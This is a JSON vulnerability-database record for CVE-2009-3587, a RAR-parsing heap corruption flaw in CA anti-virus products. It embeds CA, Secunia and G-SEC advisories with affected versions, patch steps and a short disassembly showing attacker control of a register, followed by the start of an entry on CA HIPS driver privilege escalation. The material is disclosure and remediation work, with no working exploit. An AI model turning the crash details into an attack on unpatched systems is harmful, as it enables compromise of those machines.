"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_integrated_threat_management:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:internet_security_suite:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:internet_security_suite:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:linux:linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thierry Zoller",
"sources": [
{
"db": "BID",
"id": "36653"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
}
],
"trust": 1.0
},
"cve": "CVE-2009-3587",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2009-3587",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-41033",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2009-3587",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200910-199",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-41033",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the arclib component in the Anti-Virus engine in CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 through r8.1; Anti-Virus 2007 (v8) through 2009; eTrust EZ Antivirus r7.1; Internet Security Suite 2007 (v3) through Plus 2009; and other CA products allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted RAR archive file that triggers heap corruption, a different vulnerability than CVE-2009-3588. This vulnerability CVE-2009-3588 Is a different vulnerability.Skillfully crafted by a third party RAR Service disruption via archive files (DoS) Could be put into a state or execute arbitrary code. Multiple Computer Associates products are prone to memory-corruption vulnerabilities that affect the Anti-Virus engine. \nAn attacker can exploit these issues to execute arbitrary code in the context of the affected applications or cause denial-of-service conditions. \nThe issues affect the Anti-Virus engine with versions prior to \u0027arclib\u0027 8.1.4.0. Computer Associates is the world\u0027s leading security vendor, products include a variety of anti-virus software and backup recovery systems. \nCA20091008-01: Security Notice for CA Anti-Virus Engine\n\n\nIssued: October 8, 2009\n\n\nCA\u0027s support is alerting customers to multiple security risks \nassociated with CA Anti-Virus Engine. Vulnerabilities exist in \nthe arclib component that can allow a remote attacker to cause a \ndenial of service, or to cause heap corruption and potentially \nfurther compromise a system. CA has issued fixes to address the \nvulnerabilities. An attacker can create a \nmalformed RAR archive file that results in heap corruption and \nallows the attacker to cause a denial of service or possibly \nfurther compromise the system. An attacker can create a \nmalformed RAR archive file that results in stack corruption and \nallows the attacker to cause a denial of service. \n\n\nRisk Rating\n\nMedium\n\n\nPlatform\n\nWindows\nUNIX\nLinux\nSolaris\nMac OS X\nNetware\n\n\nAffected Products\n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1\nCA Anti-Virus 2007 (v8)\nCA Anti-Virus 2008\nCA Anti-Virus 2009\nCA Anti-Virus Plus 2009\neTrust EZ Antivirus r7.1\nCA Internet Security Suite 2007 (v3)\nCA Internet Security Suite 2008\nCA Internet Security Suite Plus 2008\nCA Internet Security Suite Plus 2009\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) r8\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) 8.1\nCA Threat Manager Total Defense\nCA Gateway Security r8.1\nCA Protection Suites r2\nCA Protection Suites r3\nCA Protection Suites r3.1\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 1.1\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 8.0\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r3.0\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r3.1\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r11\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r11.1\nCA ARCserve Backup r11.5 on Windows\nCA ARCserve Backup r12 on Windows\nCA ARCserve Backup r12.0 SP1 on Windows\nCA ARCserve Backup r12.0 SP 2 on Windows\nCA ARCserve Backup r12.5 on Windows\nCA ARCserve Backup r11.1 Linux\nCA ARCserve Backup r11.5 Linux\nCA ARCserve for Windows Client Agent\nCA ARCserve for Windows Server component\nCA eTrust Intrusion Detection 2.0 SP1\nCA eTrust Intrusion Detection 3.0\nCA eTrust Intrusion Detection 3.0 SP1\nCA Common Services (CCS) r3.1\nCA Common Services (CCS) r11\nCA Common Services (CCS) r11.1\nCA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\nCA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1\n\n\nNon-Affected Products\n\nCA Anti-Virus engine with arclib version 8.1.4.0 or later \ninstalled\n\n\nHow to determine if the installation is affected\n\nFor products on Windows:\n\n1. Using Windows Explorer, locate the file \"arclib.dll\". By \n default, the file is located in the \n \"C:\\Program Files\\CA\\SharedComponents\\ScanEngine\" directory (*). \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. If the file version is earlier than indicated below, the \n installation is vulnerable. \n\n File Name File Version\n arclib.dll 8.1.4.0\n\n*For eTrust Intrusion Detection 2.0, the file is located in \n\"Program Files\\eTrust\\Intrusion Detection\\Common\", and for eTrust \nIntrusion Detection 3.0 and 3.0 sp1, the file is located in \n\"Program Files\\CA\\Intrusion Detection\\Common\". \n\nFor CA Anti-Virus r8.1 on non-Windows platforms:\n\nUse the compver utility provided on the CD to determine the \nversion of Arclib. If the version is less than 8.1.4.0, the \ninstallation is vulnerable. \n\nExample compver utility output:\n\n ------------------------------------------------\n COMPONENT NAME VERSION\n ------------------------------------------------\n eTrust Antivirus Arclib Archive Library 8.1.4.0\n ... (followed by other components)\n \n\nFor reference, the following are file names for arclib on \nnon-Windows operating systems:\n\n Operating System File name\n Solaris libarclib.so\n Linux libarclib.so\n Mac OS X arclib.bundle\n\n\nSolution\n\nCA released arclib 8.1.4.0 on August 12 2009. If your product is \nconfigured for automatic updates, you should already be protected, \nand you need to take no action. If your product is not configured \nfor automatic updates, then you simply need to run the update \nutility included with your product. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r3.0: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r3.1: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r11: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r11.1: apply fix # RO11964. \n\nCA Common Services (CCS) r3.1: apply fix # RO11954. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \n32bit: apply fix # RO10663. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \nIA64: apply fix # RO10664. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \nAMD64: apply fix # RO10665. \n\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \nr1.1: apply fix # RO10999. \n\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \nr8.0: apply fix # RO10999. \n\nCA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1: \napply fix # RO11000. \n\nCA Gateway Security r8.1: RO10999. \n\nCA ARCserve for Windows Server component installed on a 64 bit \nmachine: apply fixes # RO10663 and RO10664 (IA64) or RO10665 \n(AMD64). \n\nCA ARCserve for Windows Server component installed on a 32 bit \nmachine: apply fix # RO10663. \n\nCA ARCserve for Windows Client Agent installed on a 64 bit \nmachine: apply fix # RO10664 (IA64) or RO10665 (AMD64). \n\nCA ARCserve for Windows Client Agent installed on a 32 bit \nmachine: apply fix # RO10663. \n\nCA ARCserve for Linux Server r11.5: apply fix # RO10729. \n\nCA ARCserve for Linux:\n\n1. Download RO10729.tar.Z from RO10729 into a temporary location \n /tmp/RO10729\n\n2. Uncompress and untar RO10729.tar.Z as follows:\n uncompress RO10729.tar.Z\n tar -xvf RO10729.tar\n The new \"libarclib.so\" will be extracted to /tmp/RO10729\n\n3. Change the directory to $CAIGLBL0000/ino/config as follows:\n cd $CAIGLBL0000/ino/config\n\n4. Rename \"libarclib.so\" to \"libarclib.so.RO10729\" as follows:\n mv libarclib.so libarclib.so.RO10729\n\n5. Copy the new libarclib.so as follows:\n cp /tmp/RO10729/libarclib.so $CAIGLBL0000/ino/config/\n\n6. chmod +x $CAIGLBL0000/ino/config/libarclib.so\n\n7. Stop the common agent (caagent stop)\n\n8. Change the directory to ARCserve common agent directory \n (typically /opt/CA/BABcmagt)\n cd /opt/CA/BABcmagt\n Note: To find out the agent home directory run the following \n command:\n dirname \u0027ls -l /usr/bin/caagent |cut -f2 -d\"\u003e\"\u0027\n\n9. Save a copy of libarclib.so\n cp -p libarclib.so libarclib.so.RO10729\n\n10. Copy over the new libarclib.so as follows:\n cp $/tmp/RO10729/libarclib.so. \n\n11. Start the common agent (caagent start)\n\n12. Repeat steps (7-11) on all remote Linux client agents\u0027 \n installations. \n\n13. rm -rf /tmp/RO10729\n\n\nWorkaround\n\nDo not open email attachments or download files from untrusted \nsources. \n\n\nIf additional information is required, please contact CA Support \nat http://support.ca.com/. \n\n\nIf you discover a vulnerability in CA products, please report your \nfindings to the CA Product Vulnerability Response Team. \nsupport.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams, Director ; 0xE2941985\nCA Product Vulnerability Response Team\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2009 CA. All rights reserved. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management) \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Anti-Virus Engine RAR Processing Two Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA36976\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36976/\n\nDESCRIPTION:\nTwo vulnerabilities have been reported in multiple CA products, which\ncan be exploited by malicious people to cause a DoS (Denial of\nService) or to potentially compromise a vulnerable system. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nPlease see the vendor\u0027s advisory for detailed instructions on\napplying patches. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Thierry Zoller. \n\nORIGINAL ADVISORY:\nCA20091008-01:\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Background\n~~~~~~~~~~~~~\nQuote: \n\"CA is one of the world\u0027s largest IT management software providers. \nWe serve more than 99% of Fortune 1000 companies, as well as government \nentities, educational institutions and thousands of other companies \nin diverse industries worldwide\" \n\n\"CA Anti-Virus for the Enterprise is the next generation in comprehensive \nanti-virus security for business PCs, servers and PDAs. It combines \nproactive protection against malware with new, powerful management \nfeatures that stop and remove malicious code before it enters your \nnetwork, reducing system downtime\"\n\n\nII. \n\nAttacker has control over EBX :\n\nBasic Block:\n 6e4305b0 mov cl,byte ptr [ebx]\n Tainted Input Operands: ebx\n 6e4305b2 add edi,28h\n 6e4305b5 push edi\n 6e4305b6 lea edx,[esp+14h]\n 6e4305ba mov byte ptr [esp+14h],cl\n Tainted Input Operands: cl\n 6e4305be inc ebx\n Tainted Input Operands: ebx\n 6e4305bf push edx\n 6e4305c0 mov ecx,esi\n 6e4305c2 mov dword ptr [esp+1ch],ebx\n Tainted Input Operands: ebx\n 6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0)\n \n \n\nIII. \nDue to the nature of Anti-virus products, the attack vectors can be near endless. An attack\ncould be done over the way of an E-mail message carrying an RAR attachment (of a file\nrecognised as being RAR), USB, CD, Network data etc. \n\nPlease note that this is a general problem and not exclusive to Computer Associates. \n\n\nIV. Disclosure timeline\n~~~~~~~~~~~~~~~~~~~~~~~~~\nDD.MM.YYYY\n11.05.2009 - Reported CVE-2009-3587 \n03.06.2009 - Reported CVE-2009-3588\n09.10.2009 - CA releases advisory\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878\n13.10.2009 - G-SEC releases advisory\n\n\n\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3587"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-3587",
"trust": 3.0
},
{
"db": "BID",
"id": "36653",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "36976",
"trust": 2.6
},
{
"db": "OSVDB",
"id": "58691",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2009-2852",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1022999",
"trust": 2.5
},
{
"db": "XF",
"id": "53697",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "81918",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "81986",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-41033",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81885",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"id": "VAR-200910-0352",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-41033"
}
],
"trust": 0.01
},
"last_update_date": "2024-05-18T22:06:25.543000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "218878",
"trust": 0.8,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=218878"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/36653"
},
{
"trust": 2.5,
"url": "http://osvdb.org/58691"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1022999"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/36976"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2009/2852"
},
{
"trust": 2.2,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=218878"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/507068/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53697"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3587"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/53697"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-3587"
},
{
"trust": 0.4,
"url": "http://blog.g-sec.lu/2009/10/computer-associates-multiple-products.html"
},
{
"trust": 0.4,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/507101"
},
{
"trust": 0.3,
"url": "/archive/1/507068"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3588"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3587"
},
{
"trust": 0.1,
"url": "http://support.ca.com/."
},
{
"trust": 0.1,
"url": "https://www.g-sec.lu"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/36976/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/business_solutions/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-10-13T00:00:00",
"db": "VULHUB",
"id": "VHN-41033"
},
{
"date": "2009-10-09T00:00:00",
"db": "BID",
"id": "36653"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"date": "2009-10-12T20:41:50",
"db": "PACKETSTORM",
"id": "81918"
},
{
"date": "2009-10-12T11:21:41",
"db": "PACKETSTORM",
"id": "81885"
},
{
"date": "2009-10-14T23:09:22",
"db": "PACKETSTORM",
"id": "81986"
},
{
"date": "2009-10-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"date": "2009-10-13T10:30:00.610000",
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-11-15T00:00:00",
"db": "VULHUB",
"id": "VHN-41033"
},
{
"date": "2009-10-13T15:38:00",
"db": "BID",
"id": "36653"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"date": "2024-05-17T17:25:39.707000",
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural CA Product Anti-Virus In the engine arclib Vulnerability in arbitrary code execution in components",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
}
],
"trust": 0.6
}
}
VAR-200701-0265
Vulnerability from variot - Updated: 2023-12-18 14:06Computer Associates Host Intrusion Prevention System (HIPS) drivers (1) Core kmxstart.sys 6.5.4.31 and (2) Firewall kmxfw.sys 6.5.4.10 allow local users to gain privileges by using certain privileged IOCTLs to modify callback function pointers. Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities. An attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers. These isses affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior. Computer Associates is the world's leading security vendor, products include a variety of anti-virus software and backup recovery systems. There is a problem in the implementation of the driver of CA HIPS products, and local attackers may use this vulnerability to elevate their privileges.
To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German.
The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios.
